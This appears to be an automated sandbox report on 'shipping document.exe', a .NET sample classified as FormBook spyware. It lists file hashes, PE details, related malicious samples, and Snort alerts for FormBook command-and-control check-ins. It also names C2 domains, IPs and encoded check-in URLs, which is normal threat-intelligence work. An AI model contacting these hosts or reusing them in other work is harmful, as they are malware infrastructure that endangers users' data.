                                                                                          • EGA enabled
                                                                                          • AMSI enabled
                                                                                          Analysis Mode:default
                                                                                          Analysis stop reason:Timeout
                                                                                          Sample name:shipping document.exe
                                                                                          Detection:MAL
                                                                                          Classification:mal100.troj.spyw.evad.winEXE@7/2@16/11
                                                                                          EGA Information:
                                                                                          • Successful, ratio: 75%
                                                                                          HCA Information:
                                                                                          • Successful, ratio: 97%
                                                                                          • Number of executed functions: 135
                                                                                          • Number of non-executed functions: 316
                                                                                          Cookbook Comments:
                                                                                          • Found application associated with file extension: .exe
                                                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                          Warnings

                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                          • Execution Graph export aborted for target oWRaEnEJAq.exe, PID 2132 because it is empty
                                                                                          • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.

                                                                                          Simulations

                                                                                          Behavior and APIs

                                                                                          TimeTypeDescription
                                                                                          07:25:16API Interceptor1x Sleep call for process: shipping document.exe modified
                                                                                          07:26:29API Interceptor9570908x Sleep call for process: openfiles.exe modified

                                                                                          Joe Sandbox View / Context

                                                                                          IPs

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          162.240.81.18INQ No.KP-50-000-PS-IN-INQ-0027.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.aprovapapafox.com/aleu/
                                                                                          Payment_Advice.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.agoraeubebo.com/niik/
                                                                                          bin.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                          • www.agoraeubebo.com/nrup/
                                                                                          ccWXalS8xg.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                          • www.agoraeubebo.com/nrup/?jH1=cn4P66&Gv=dWrD1PFadq7V5KkT4LFo0o0ceK+Fdoxu4bG3e9Abb7XIEj/TR5WidBvHl5Crj+jPOsSaqiQVqCgntzF+MJy+srxryBjk62On/DUjB7mkf9HqIW/2fSnYTpA=
                                                                                          1No1dv4uLe.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                          • www.agoraeubebo.com/nrup/
                                                                                          Sf5Aw7E8Cu.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                          • www.agoraeubebo.com/nrup/
                                                                                          Petro Masila 105321.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.marinamaquiagens.online/4vs4/
                                                                                          PO 027371.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.marinamaquiagens.online/4vs4/
                                                                                          Sandflugters.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                          • www.tintasmaiscor.com/tsq7/
                                                                                          Lokalplanlgningen.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                          • www.tintasmaiscor.com/tsq7/
                                                                                          157.7.107.63shipping document.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                          • www.a-two-spa-salon.com/3g97/
                                                                                          217.160.0.111listXofXP.O.docGet hashmaliciousFormBookBrowse
                                                                                          • www.andrewcrawford.store/q8io/?O4883=HXFtJZVPfNB0&-ZEHgzPx=9NBY9KXzWN9RAeS5ibqsEdeev5FWFMIFtZ8Uab8Ez6YdQ5xfInqB1smFejio0oqmJamksA==
                                                                                          80.240.20.220shipping document.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                            NEW ORDER.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                              64.190.62.22m2 Cotizaci#U00f3n-1634.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.solar-windturbine.life/q696/
                                                                                              INQ No.KP-50-000-PS-IN-INQ-0027.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.paydayloans3.shop/aleu/
                                                                                              HYCO_Invoices MS2 & MS3.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.paydayloans3.shop/aleu/
                                                                                              narud#U017ebenicu 0BH2024.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.6travel-insurance.xyz/dd20/?GFQL1=zSsDwZvpFiG+zW3meVFxqTB90KbWJdKl2XBal2vs8lrKzMskebZ1s7YKNa51Owxzvzr1&lf20=sBdp88JXEddd9
                                                                                              n3R8WBIjhz.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.guard-dd.online/kh11/?1bwhTVVh=5AOe8i8fQA+d/RLn8pJP+59XDsSJ3aDT/cyFjnHYvO1StO4m66d0qWdWW06Hjy/7Wfuq&or=3f5pdRHX
                                                                                              8C3H9zQgK2.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.guard-dd.online/kh11/?yT=H0GxcDi&9r=5AOe8i8fQA+d/RLn8pJP+59XDsSJ3aDT/cyFjnHYvO1StO4m66d0qWdWW3aYoS/FWfyn
                                                                                              1LZvA2cEfV.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                              • www.hofiw.link/4bud/
                                                                                              XJBYhQFCGi.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.hofiw.link/m8cr/
                                                                                              aMVimXl3J6.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.black-loan3.shop/kh11/?ntS0L=0yJkafcW8nzbNP7bGomjgpqJraTo/XSswctIVgDnSID0J3uCkRMhL6LbKCDoTr01MxshBBLhug==&Yr=DbvxavN0kTq4E
                                                                                              our order 6076297.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.hofiw.link/e25x/

                                                                                              Domains

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              www.a-two-spa-salon.comshipping document.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                              • 157.7.107.63
                                                                                              parkingpage.namecheap.comPago pendiente.exeGet hashmaliciousFormBookBrowse
                                                                                              • 91.195.240.19
                                                                                              PO0423024.exeGet hashmaliciousFormBookBrowse
                                                                                              • 91.195.240.19
                                                                                              PO0423023.exeGet hashmaliciousFormBookBrowse
                                                                                              • 91.195.240.19
                                                                                              INQ No.KP-50-000-PS-IN-INQ-0027.exeGet hashmaliciousFormBookBrowse
                                                                                              • 91.195.240.19
                                                                                              Ordine_doc_419024001904.batGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                              • 91.195.240.19
                                                                                              PO_La-Tanerie04180240124.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                              • 91.195.240.19
                                                                                              PO_La-Tanerie04180240124.batGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                              • 91.195.240.19
                                                                                              Arrival Notice.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                              • 91.195.240.19
                                                                                              NEW-ORDER_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                              • 91.195.240.19
                                                                                              202404153836038.EXE.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                              • 91.195.240.19
                                                                                              www.jthzbrdb.funshipping document.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                              • 80.240.20.220
                                                                                              NEW ORDER.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                              • 80.240.20.220
                                                                                              td-ccm-neg-87-45.wixdns.netStatement Of Account.exeGet hashmaliciousFormBookBrowse
                                                                                              • 34.149.87.45
                                                                                              http://geoguesser.com/seterra/en-an/vpg/3811?C=K44CTGet hashmaliciousUnknownBrowse
                                                                                              • 34.149.87.45
                                                                                              http://geoguesser.com/seterra/en-an/vpg/3800Get hashmaliciousUnknownBrowse
                                                                                              • 34.149.87.45
                                                                                              Ola#U011fan#U00fcst#U00fc #U00f6deme.exeGet hashmaliciousFormBookBrowse
                                                                                              • 34.149.87.45
                                                                                              BL4567GH67_xls.exeGet hashmaliciousFormBookBrowse
                                                                                              • 34.149.87.45
                                                                                              https://hopp.bio/documentGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                              • 34.149.87.45
                                                                                              https://hopp.bio/pdf-documentGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                              • 34.149.87.45
                                                                                              W9PJhOS2if.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                                                                                              • 34.149.87.45
                                                                                              KCS20240042- cutoms clearance doc.exeGet hashmaliciousFormBookBrowse
                                                                                              • 34.149.87.45
                                                                                              Purchase Order#44231.exeGet hashmaliciousFormBookBrowse
                                                                                              • 34.149.87.45
                                                                                              www.paydayloans3.shopINQ No.KP-50-000-PS-IN-INQ-0027.exeGet hashmaliciousFormBookBrowse
                                                                                              • 64.190.62.22
                                                                                              HYCO_Invoices MS2 & MS3.exeGet hashmaliciousFormBookBrowse
                                                                                              • 64.190.62.22

                                                                                              ASNs

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              INTERQGMOInternetIncJPshipping document.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                              • 157.7.107.63
                                                                                              tajma.x86-20240422-0535.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                              • 118.27.80.227
                                                                                              QXeoSsX87R.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                              • 157.7.100.23
                                                                                              mpsl.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                              • 157.7.79.166
                                                                                              arm7.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                              • 157.7.100.11
                                                                                              240330_unpackedGet hashmaliciousUnknownBrowse
                                                                                              • 157.7.189.53
                                                                                              Dokument-99373.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                              • 157.7.189.60
                                                                                              mrPTE618YB.exeGet hashmaliciousPureLog StealerBrowse
                                                                                              • 160.251.83.161
                                                                                              ARKublg5Cr.exeGet hashmaliciousFormBookBrowse
                                                                                              • 150.95.255.38
                                                                                              5eLzbTDypM.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                              • 157.7.79.199
                                                                                              ONEANDONE-ASBrauerstrasse48DEZapytanie ofertowe (7427-23 ROCKFIN).exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                                                              • 213.165.67.118
                                                                                              INQ No.KP-50-000-PS-IN-INQ-0027.exeGet hashmaliciousFormBookBrowse
                                                                                              • 217.76.128.34
                                                                                              https://lamerelea.com/Get hashmaliciousUnknownBrowse
                                                                                              • 217.160.0.59
                                                                                              Gq7FlDf6cE.elfGet hashmaliciousMiraiBrowse
                                                                                              • 217.174.247.147
                                                                                              Signed Proforma Invoice 3645479_pdf.vbsGet hashmaliciousFormBookBrowse
                                                                                              • 217.160.0.95
                                                                                              https://recouvrement-assurance.fr/LKeZLGet hashmaliciousUnknownBrowse
                                                                                              • 82.165.105.163
                                                                                              https://recouvrement-assurance.fr/LKeZLGet hashmaliciousUnknownBrowse
                                                                                              • 82.165.105.163
                                                                                              Tepanec.vbeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                              • 213.165.67.118
                                                                                              1704202412475.EXE.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                              • 217.160.0.183
                                                                                              16042024124528724.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                              • 217.160.0.183
                                                                                              UNIFIEDLAYER-AS-1US62402781, Fiyat Teklif Talebi.pdf.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                                                              • 108.167.140.123
                                                                                              DHL_1003671162.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 50.87.253.239
                                                                                              1000901 LIQUIDACION.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                              • 162.241.253.78
                                                                                              FT. 40FE CNY .xlsx.lnkGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                              • 192.185.124.132
                                                                                              CREDIT NOTE.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 192.185.129.60
                                                                                              Total Invoices.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 192.185.129.60
                                                                                              knfV5IVjEV.lnkGet hashmaliciousUnknownBrowse
                                                                                              • 162.241.216.65
                                                                                              http://www.noahsarkademy.comGet hashmaliciousUnknownBrowse
                                                                                              • 69.49.230.31
                                                                                              CR-FEDEX_TN-775720741041.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                              • 192.185.13.234
                                                                                              Wire Transfer Payment Receipt#2024-22-04.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 162.144.15.164
                                                                                              AS-CHOOPAUSRemittance. #U0440df.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                              • 45.76.249.237
                                                                                              NMdpQecbkg.elfGet hashmaliciousMiraiBrowse
                                                                                              • 44.40.187.94
                                                                                              shipping document.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                              • 80.240.20.220
                                                                                              lS9yzwGRef.elfGet hashmaliciousMiraiBrowse
                                                                                              • 44.174.121.50
                                                                                              Q2bIN963Kt.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                              • 44.174.121.31
                                                                                              Yui1pUgieI.elfGet hashmaliciousMiraiBrowse
                                                                                              • 44.40.164.138
                                                                                              NEW ORDER.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                              • 80.240.20.220
                                                                                              jLntRRok3B.elfGet hashmaliciousMiraiBrowse
                                                                                              • 44.40.163.66
                                                                                              u2.batGet hashmaliciousBazar Loader, QbotBrowse
                                                                                              • 45.77.68.166

                                                                                              JA3 Fingerprints

                                                                                              No context

                                                                                              Dropped Files

                                                                                              No context

                                                                                              Created / dropped Files

                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\shipping document.exe.log

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\shipping document.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1216
                                                                                              Entropy (8bit):5.34331486778365
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                              Malicious:false
                                                                                              Reputation:high, very likely benign file
                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                              C:\Users\user\AppData\Local\Temp\03F67l1929

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\openfiles.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                              Category:dropped
                                                                                              Size (bytes):114688
                                                                                              Entropy (8bit):0.9746603542602881
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                              Malicious:false
                                                                                              Reputation:high, very likely benign file
                                                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                              Static File Info

                                                                                              General

                                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Entropy (8bit):7.954404387796586
                                                                                              TrID:
                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                                                                                              • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                              • Windows Screen Saver (13104/52) 0.07%
                                                                                              • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                              File name:shipping document.exe
                                                                                              File size:730'112 bytes
                                                                                              MD5:180165361384e56db00389733f0c54f5
                                                                                              SHA1:1d48e601e3ba392fafde82b4a7fc0a39fba0a382
                                                                                              SHA256:48ca70c01e870434304ccd508ef88d824b8d3c9588c990402dae450a5e56f73c
                                                                                              SHA512:e6bcb1cc13e5229889cb9dfdf495bd44278259eb7a9dbaaa1d9d250be61e7b2665e3058592da07111c758b6e8901f7bacb67ee6df8d2048c8b39f5c5a010d3df
                                                                                              SSDEEP:12288:yNgLeFR6IXlv312Z33NUiiVtMrT5Xgb/ToMiliQNDksybWWcirgNw76c/Xz0:mXJ312Z3uiUrTAi+yaWBrvB
                                                                                              TLSH:79F4225133EA4912D27C1B760CB940115BF2F85A6A70C3DC8DE294CB46D3F0A8EB5B6B
                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....e(f..............0.............&,... ...@....@.. ....................................@................................

                                                                                              File Icon

                                                                                              Icon Hash:356d6165656175d6

                                                                                              Static PE Info

                                                                                              General

                                                                                              Entrypoint:0x4b2c26
                                                                                              Entrypoint Section:.text
                                                                                              Digitally signed:false
                                                                                              Imagebase:0x400000
                                                                                              Subsystem:windows gui
                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                              Time Stamp:0x6628652E [Wed Apr 24 01:49:34 2024 UTC]
                                                                                              TLS Callbacks:
                                                                                              CLR (.Net) Version:
                                                                                              OS Version Major:4
                                                                                              OS Version Minor:0
                                                                                              File Version Major:4
                                                                                              File Version Minor:0
                                                                                              Subsystem Version Major:4
                                                                                              Subsystem Version Minor:0
                                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                              Entrypoint Preview

                                                                                              Instruction
                                                                                              jmp dword ptr [00402000h]
                                                                                              inc esi
                                                                                              dec edi
                                                                                              push edx
                                                                                              xor al, 54h
                                                                                              xor eax, 42384738h
                                                                                              aaa
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [edi], dh
                                                                                              cmp byte ptr [ecx+50h], dl
                                                                                              xor eax, 36374734h
                                                                                              pop edx
                                                                                              inc ebx
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al

                                                                                              Data Directories

                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xb2bd40x4f.text
                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xb40000x9c4.rsrc
                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xb60000xc.reloc
                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                              Sections

                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                              .text0x20000xb0c4c0xb1000b7a352f0fd823bcf49779771e8b35c13False0.9617513020833334data7.9656292226257115IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                              .rsrc0xb40000x9c40xc00e46c16c3576457b7e2a5b79e17ee2862False0.4479166666666667data5.076861687014913IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                              .reloc0xb60000xc0x400687e0b0f6a253d7b27d3db6718cd0f88False0.025390625data0.05585530805374581IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                              Resources

                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                              RT_ICON0xb40c80x576PNG image data, 158 x 158, 8-bit/color RGBA, non-interlaced0.6552217453505007
                                                                                              RT_GROUP_ICON0xb46500x14data1.15
                                                                                              RT_VERSION0xb46740x34cdata0.42298578199052134

                                                                                              Imports

                                                                                              DLLImport
                                                                                              mscoree.dll_CorExeMain

                                                                                              Network Behavior

                                                                                              Snort IDS Alerts

                                                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                              04/24/24-07:28:11.543102TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24976980192.168.2.4118.27.122.214
                                                                                              04/24/24-07:28:46.802004TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34977880192.168.2.491.195.240.19
                                                                                              04/24/24-07:26:07.020850TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24974080192.168.2.480.240.20.220
                                                                                              04/24/24-07:26:49.463195TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974780192.168.2.4172.217.16.36
                                                                                              04/24/24-07:27:56.800788TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24976580192.168.2.464.190.62.22
                                                                                              04/24/24-07:28:25.424795TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24977380192.168.2.434.149.87.45
                                                                                              04/24/24-07:27:50.139936TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34976380192.168.2.464.190.62.22
                                                                                              04/24/24-07:26:26.677111TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974380192.168.2.4157.7.107.63
                                                                                              04/24/24-07:28:32.187219TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34977480192.168.2.431.186.11.254
                                                                                              04/24/24-07:28:40.873036TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24977780192.168.2.431.186.11.254
                                                                                              04/24/24-07:28:55.307064TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24978180192.168.2.491.195.240.19
                                                                                              04/24/24-07:29:21.231363TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34978380192.168.2.491.195.240.19
                                                                                              04/24/24-07:27:05.371216TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34975180192.168.2.4203.161.46.103
                                                                                              04/24/24-07:28:05.904124TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34976780192.168.2.4118.27.122.214
                                                                                              04/24/24-07:27:20.740777TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34975580192.168.2.4162.240.81.18
                                                                                              04/24/24-07:28:17.312788TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34977080192.168.2.434.149.87.45
                                                                                              04/24/24-07:29:18.390720TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34978280192.168.2.491.195.240.19
                                                                                              04/24/24-07:27:41.169057TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24976180192.168.2.4217.160.0.111
                                                                                              04/24/24-07:26:32.277775TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24974580192.168.2.4157.7.107.63
                                                                                              04/24/24-07:26:23.075794TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974280192.168.2.4157.7.107.63
                                                                                              04/24/24-07:27:02.680174TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34975080192.168.2.4203.161.46.103
                                                                                              04/24/24-07:27:32.176814TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34975880192.168.2.4217.160.0.111
                                                                                              04/24/24-07:28:35.078110TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34977580192.168.2.431.186.11.254
                                                                                              04/24/24-07:26:46.608926TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974680192.168.2.4172.217.16.36
                                                                                              04/24/24-07:27:10.777632TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24975380192.168.2.4203.161.46.103
                                                                                              04/24/24-07:28:49.635121TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34977980192.168.2.491.195.240.19
                                                                                              04/24/24-07:27:35.011996TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34975980192.168.2.4217.160.0.111
